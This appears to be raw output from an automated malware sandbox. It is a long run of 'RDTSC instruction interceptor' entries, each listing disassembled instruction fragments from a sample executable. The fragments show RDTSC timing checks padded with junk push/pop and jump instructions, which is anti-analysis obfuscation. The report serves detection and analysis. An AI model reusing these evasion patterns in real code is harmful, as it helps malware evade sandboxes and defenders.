Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9B227 second address: E9B255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39713h 0x0000000d jmp 00007F4BA0D39713h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9B406 second address: E9B40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9B40C second address: E9B410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA14CB second address: EA14D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA14D7 second address: EA14DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA14DB second address: EA14F7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007F4BA0D3F156h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jno 00007F4BA0D3F156h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA14F7 second address: EA152C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39718h 0x00000008 jmp 00007F4BA0D39718h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA152C second address: EA1532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9FE34 second address: E9FE38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9FE38 second address: E9FE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F4BA0D3F167h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9FFAF second address: E9FFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9FFB4 second address: E9FFBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9FFBC second address: E9FFC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9FFC6 second address: E9FFCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9FFCA second address: E9FFCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56E49 second address: E56E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56E5B second address: E56EF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39717h 0x00000008 jmp 00007F4BA0D39711h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F4BA0D39708h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d jo 00007F4BA0D3970Ch 0x00000033 xor edi, 46E59F1Ah 0x00000039 mov dh, ch 0x0000003b mov ebx, dword ptr [ebp+12481EF8h] 0x00000041 add eax, ebx 0x00000043 push 00000000h 0x00000045 push edx 0x00000046 call 00007F4BA0D39708h 0x0000004b pop edx 0x0000004c mov dword ptr [esp+04h], edx 0x00000050 add dword ptr [esp+04h], 00000018h 0x00000058 inc edx 0x00000059 push edx 0x0000005a ret 0x0000005b pop edx 0x0000005c ret 0x0000005d mov dword ptr [ebp+12467AE4h], edi 0x00000063 nop 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F4BA0D3970Dh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56EF6 second address: E56EFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56EFB second address: E56F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jc 00007F4BA0D39706h 0x00000010 js 00007F4BA0D39706h 0x00000016 popad 0x00000017 jnl 00007F4BA0D39708h 0x0000001d popad 0x0000001e nop 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007F4BA0D39708h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 push ebx 0x0000003a mov di, 3D32h 0x0000003e pop edx 0x0000003f sub edx, dword ptr [ebp+122D1E13h] 0x00000045 push 00000004h 0x00000047 mov edi, dword ptr [ebp+122D1F13h] 0x0000004d xor edx, 5DD72AF1h 0x00000053 nop 0x00000054 jmp 00007F4BA0D39713h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F4BA0D39713h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA06A2 second address: EA06A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA06A6 second address: EA06AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA06AC second address: EA06E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F160h 0x00000007 jnc 00007F4BA0D3F163h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F4BA0D3F162h 0x00000017 jnc 00007F4BA0D3F156h 0x0000001d jl 00007F4BA0D3F156h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA4392 second address: EA43CB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4BA0D39706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4BA0D3970Bh 0x0000000f jp 00007F4BA0D3971Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA40CC second address: EA40D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAA22A second address: EAA22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAA22F second address: EAA253 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F4BA0D3F164h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAA253 second address: EAA25D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAAB69 second address: EAAB6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAAB6D second address: EAAB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39711h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAAB86 second address: EAAB8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAAB8A second address: EAAB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAB16C second address: EAB198 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F4BA0D3F164h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4BA0D3F160h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EAB198 second address: EAB19C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EABD28 second address: EABD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EABD2E second address: EABD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EABD32 second address: EABD36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EABD36 second address: EABD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EABD3F second address: EABD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Ah 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F4BA0D3F156h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EB4EC7 second address: EB4EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D39718h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EB4EE3 second address: EB4EE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EB4EE9 second address: EB4F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F4BA0D3970Eh 0x0000000c jno 00007F4BA0D39706h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jg 00007F4BA0D39706h 0x0000001d popad 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EB4F0A second address: EB4F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EB4F16 second address: EB4F2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39712h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EB50AF second address: EB50BE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EB50BE second address: EB50D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 ja 00007F4BA0D39708h 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EBFB6F second address: EBFB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F4BA0D3F156h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EBFB7E second address: EBFB82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EBFE17 second address: EBFE25 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EC04ED second address: EC04F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EC04F1 second address: EC04F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EC12F5 second address: EC1321 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4BA0D39726h 0x00000008 jmp 00007F4BA0D3970Dh 0x0000000d jmp 00007F4BA0D39713h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EC1321 second address: EC1327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EBF2F6 second address: EBF305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F4BA0D39706h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EBF305 second address: EBF30B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EBF30B second address: EBF311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EC685B second address: EC686C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3F156h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EC6B1D second address: EC6B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F4BA0D39706h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EC6B2D second address: EC6B31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED10D2 second address: ED10D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED10D6 second address: ED10DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED10DA second address: ED10EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D3970Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED10EF second address: ED10F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED10F3 second address: ED1109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39712h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED1109 second address: ED110F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED2BE2 second address: ED2BE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED2BE7 second address: ED2BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 js 00007F4BA0D3F15Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED2D3B second address: ED2D5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39714h 0x00000008 jnc 00007F4BA0D39706h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED534C second address: ED5352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED5352 second address: ED5356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED54CE second address: ED54DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F4BA0D3F156h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED54DB second address: ED54E5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4BA0D3970Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED54E5 second address: ED54F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F4BA0D3F15Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED9D18 second address: ED9D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jmp 00007F4BA0D3970Ch 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED9D34 second address: ED9D3E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: ED9D3E second address: ED9D45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EDF19E second address: EDF1B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F4BA0D3F158h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E08CF1 second address: E08CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EE8867 second address: EE8882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F4BA0D3F156h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EE8882 second address: EE8886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EEF95D second address: EEF964 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EEE31B second address: EEE325 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3970Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EF4081 second address: EF408C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F4BA0D3F156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F00124 second address: F00134 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4BA0D39706h 0x00000008 jo 00007F4BA0D39706h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F00134 second address: F0016E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jmp 00007F4BA0D3F165h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4BA0D3F166h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F0D65B second address: F0D65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F2549A second address: F254A4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4BA0D3F172h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F24524 second address: F24536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F24679 second address: F24681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F2493F second address: F24945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F24945 second address: F24949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
